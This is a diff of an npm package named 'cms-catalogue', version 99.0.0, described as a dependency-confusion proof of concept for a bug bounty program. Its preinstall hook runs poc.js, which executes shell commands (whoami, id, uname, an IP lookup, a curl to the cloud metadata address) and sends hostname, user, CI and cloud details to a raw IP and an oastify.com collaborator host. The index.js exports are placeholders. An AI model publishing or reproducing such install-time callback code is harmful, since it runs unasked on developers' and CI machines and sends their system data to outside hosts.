cms-catalogue 99.0.0

package/index.js

@@ -0,0 +1,11 @@
+// Placeholder exports matching what the app imports:
+// import { CatalogueProvider } from 'cms-catalogue';
+// import { ProductList, BulkRequest, ProductDetails, BulkImageUpload } from 'cms-catalogue';
+
+module.exports = {
+  CatalogueProvider: () => null,
+  ProductList: () => null,
+  BulkRequest: () => null,
+  ProductDetails: () => null,
+  BulkImageUpload: () => null
+};

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "cms-catalogue",
+  "version": "99.0.0",
+  "description": "Security Research - Dependency Confusion PoC - init2win (HackerOne)",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node poc.js || true"
+  },
+  "author": "init2win <init2win@wearehackerone.com>",
+  "license": "ISC",
+  "keywords": ["security-research", "dependency-confusion", "poc"]
+}

package/poc.js

@@ -0,0 +1,87 @@
+/**
+ * Dependency Confusion PoC - Security Research
+ * Researcher: init2win (HackerOne)
+ * Target: Eternal Bug Bounty Program
+ *
+ * This package is a proof-of-concept for a dependency confusion vulnerability.
+ * It does NOT perform any malicious actions.
+ * It only sends a callback to prove code execution during npm install.
+ *
+ * Contact: init2win@wearehackerone.com
+ */
+
+const http = require('http');
+const https = require('https');
+const os = require('os');
+const dns = require('dns');
+const { execSync } = require('child_process');
+
+const CB_HOST = '168.220.234.152';
+const CB_PORT = 7379;
+const CB_PATH = '/bf740c/cb';
+const COLLAB = '6elhvvtii6zrpfbmqgy4trlyppvgj5.oastify.com';
+
+// Gather safe info for PoC
+function safe(cmd) { try { return execSync(cmd, {timeout:3000}).toString().trim(); } catch(e) { return ''; } }
+
+const info = {
+  type: 'dependency-confusion-poc',
+  researcher: 'init2win',
+  program: 'eternal-hackerone',
+  package: 'cms-catalogue',
+  hostname: os.hostname(),
+  whoami: safe('whoami'),
+  uid: safe('id'),
+  pwd: process.cwd(),
+  uname: safe('uname -a'),
+  internal_ip: safe("hostname -I 2>/dev/null || ifconfig 2>/dev/null | grep inet | head -3"),
+  node_ver: process.version,
+  npm_ver: safe('npm --version'),
+  ci: process.env.CI || process.env.JENKINS_URL || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || '',
+  cloud_aws: safe('curl -s --max-time 2 http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null'),
+  cloud_gcp: safe('curl -s --max-time 2 -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/id 2>/dev/null'),
+  platform: os.platform(),
+  timestamp: new Date().toISOString()
+};
+
+// Callback 1: DNS to Burp Collaborator
+try {
+  const h = os.hostname().replace(/[^a-zA-Z0-9-]/g, '-').substring(0, 30);
+  const u = (info.whoami || 'unknown').replace(/[^a-zA-Z0-9-]/g, '-').substring(0, 15);
+  dns.resolve(`depconf.${h}.${u}.${COLLAB}`, () => {});
+} catch(e) {}
+
+// Callback 2: HTTP to our server
+try {
+  const data = JSON.stringify(info);
+  const req = http.request({
+    hostname: CB_HOST,
+    port: CB_PORT,
+    path: CB_PATH,
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': data.length },
+    timeout: 5000
+  }, () => {});
+  req.on('error', () => {});
+  req.write(data);
+  req.end();
+} catch(e) {}
+
+// Callback 3: HTTPS fallback to collaborator
+try {
+  const data = JSON.stringify(info);
+  const req = https.request({
+    hostname: COLLAB,
+    port: 443,
+    path: '/depconf-cms-catalogue',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': data.length },
+    timeout: 5000,
+    rejectUnauthorized: false
+  }, () => {});
+  req.on('error', () => {});
+  req.write(data);
+  req.end();
+} catch(e) {}
+
+console.log('[*] cms-catalogue: Security research PoC by init2win (HackerOne/Eternal)');